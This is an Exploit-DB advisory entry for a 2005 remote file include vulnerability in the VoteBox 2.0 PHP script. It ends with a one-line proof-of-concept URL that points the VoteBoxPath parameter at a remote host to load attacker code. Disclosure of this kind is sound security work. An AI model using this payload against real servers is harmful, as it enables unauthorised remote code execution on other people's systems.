VoteBox 2.0 Votebox.PHP Remote File Include Vulnerability

2005-03-14T00:00:00
ID EDB-ID:25226
Type exploitdb
Reporter SmOk3
Modified 2005-03-14T00:00:00

Description

VoteBox 2.0 Votebox.PHP Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/12806/info

It is reported that VoteBox is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'votebox.php' script.

Remote attackers could potentially exploit this issue to include and execute a remote malicious PHP script.

This issue reportedly affects VoteBox version 2.0, previous versions might also be affected. 

www.example.com/votebox.php?VoteBoxPath=http://[CMD]